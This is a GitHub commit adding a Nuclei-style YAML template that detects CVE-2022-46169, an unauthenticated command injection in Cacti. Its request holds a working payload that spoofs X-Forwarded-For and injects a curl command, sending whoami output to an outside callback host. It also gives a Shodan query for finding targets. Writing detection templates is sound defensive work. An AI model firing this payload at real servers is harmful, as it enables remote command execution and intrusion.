Merge pull request #6419 from HardikSolanki96/CVE-2022-46169.yaml

Create CVE-2022-46169.yaml
patch-1
pussycat0x 2022-12-29 22:38:39 +05:30 committed by GitHub
commit b3215496ac
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 48 additions and 0 deletions

View File

@ -0,0 +1,48 @@
id: CVE-2022-46169
info:
name: Cacti <= 1.2.22 Unauthenticated Command Injection
author: Hardik-Solanki
severity: critical
description: |
The vulnerability allows a remote attacker to compromise the affected system. The vulnerability exists due to insufficient authorization within the Remote Agent when handling HTTP requests with a custom Forwarded-For HTTP header. A remote non-authenticated attacker can send a specially crafted HTTP request to the affected instance and execute arbitrary OS commands on the server.
reference:
- https://security-tracker.debian.org/tracker/CVE-2022-46169
- https://nvd.nist.gov/vuln/detail/CVE-2022-46169
- https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf
- https://www.cybersecurity-help.cz/vdb/SB2022121926
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-46169
cwe-id: CWE-285
metadata:
verified: "true"
shodan-query: title:"Login to Cacti"
tags: cve2022,cve,auth-bypass,cacti
requests:
- raw:
- |
GET /remote_agent.php?action=polldata&local_data_ids[0]=1&host_id=1&poller_id=;curl%20{{interactsh-url}}/`whoami`; HTTP/1.1
Host: {{Hostname}}
X-Forwarded-For: 127.0.0.1
unsafe: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"value":'
- '"local_data_id":'
condition: and
- type: word
part: interactsh_protocol
words:
- "http"
- type: status
status:
- 200